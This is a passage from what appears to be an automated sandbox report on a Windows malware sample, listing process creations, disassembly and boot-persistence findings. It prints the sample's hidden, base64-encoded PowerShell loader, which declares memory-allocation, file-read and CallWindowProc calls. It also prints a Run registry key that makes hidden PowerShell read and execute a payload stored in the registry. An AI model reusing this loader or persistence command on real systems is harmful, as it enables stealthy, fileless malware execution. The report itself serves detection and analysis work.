B0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0826C51F pushfd ; retn 0008h3_2_0826C529
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08420A70 push esp; iretd 3_2_08420A71
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0848D070 push eax; mov dword ptr [esp], edx3_2_0848D084
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08488109 push eax; mov dword ptr [esp], edx3_2_0848811C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08151140 pushad ; ret 9_2_08151141
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081CE47A pushad ; ret 9_2_081CE499
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081CE49A pushfd ; ret 9_2_081CE4A9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_082962E0 push C307BDD5h; ret 9_2_0829649B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0898BEE5 pushfd ; retf 9_2_0898BEE6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0898C794 push esp; retf 9_2_0898C795
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08984FE8 push eax; retf 9_2_08984FE9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A4A60 pushfd ; ret 9_2_089A4A70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A4C30 pushfd ; ret 9_2_089A4C40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A8D91 pushfd ; ret 9_2_089A8DA0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089AFDC0 pushfd ; ret 9_2_089AFDD0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089ABE91 pushfd ; ret 9_2_089ABEA0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A9FD1 pushfd ; ret 9_2_089AA000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A3F20 pushfd ; ret 9_2_089A3F30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089ABF40 pushfd ; ret 9_2_089ABF50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089AB1F0 pushfd ; ret 9_2_089AB200
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A3132 pushfd ; ret 9_2_089A3140
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A5290 pushfd ; ret 9_2_089A52E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A8332 pushfd ; ret 9_2_089A8360
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A5328 pushfd ; ret 9_2_089A52E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089AA430 pushfd ; ret 9_2_089AA440
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089AA7D1 pushfd ; ret 9_2_089AA800
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A3738 pushfd ; ret 9_2_089A3740
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089B1E2C push ds; iretd 9_2_089B1E2F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089DA0E1 push es; ret 9_2_089DA070
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089DA069 push es; ret 9_2_089DA070
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089D7180 push es; ret 9_2_089D7190
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdlineJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uotckr0j.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vybs2gqu.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mla4kvb3.dllJump to dropped file

            Boot Survival:

            barindex
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2Jump to behavior
            Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2Jump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2Jump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
